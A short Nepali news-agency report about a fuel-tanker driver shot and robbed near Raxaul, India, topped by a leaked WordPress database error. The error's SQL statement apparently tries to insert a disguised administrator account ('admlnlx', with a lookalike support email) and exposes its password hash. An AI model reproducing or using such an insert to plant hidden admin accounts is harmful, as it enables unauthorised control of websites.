WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bmg36tocDP.oQTlsVfJ0FQNa5aJhsP1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 09:27:01', '', 'admlnlx', 'admlnlx')
वीरगन्ज,पुस १२ –
आज बिहान भारतको बरोनीबाट पोखराका लागि इन्धन बोकी आइरहेको ना५ख ८८४५ नं का ट्याङ्कर चालकलाई भारतको रक्सौलमा अज्ञात दुई जनाले गोली प्रहार गरी भारु चार हजार पाँच सय लुटेर लगेका छन् ।
सीमावर्ती भारतको रक्सौल बजारबाट तीन किमी अगाडि सो अज्ञात समूहले सुरुमा ट्यांकर चालक अमलेखगन्ज–४ बस्ने तुलाराम उपाध्यायलाई कटुवा पेस्तोलले टाउकामा हान्दा प्रतिकार गरेपछि चालकलाई बायाँ खुट्टामा गोली प्रहार गरी घाइते पारेर सो रकम लुटिलगेको पर्साका प्रहरी उपरीक्षक गोविन्दकुमार शाहले बताउनुभयो ।
चालकको अवस्था सामान्य छ । चालकले भारतीय प्रहरी तथा नेपाल प्रहरीलाई नभई अमलेखगन्ज प्रहरीलाई जानकारी दिएको जनाइएको छ । – रासस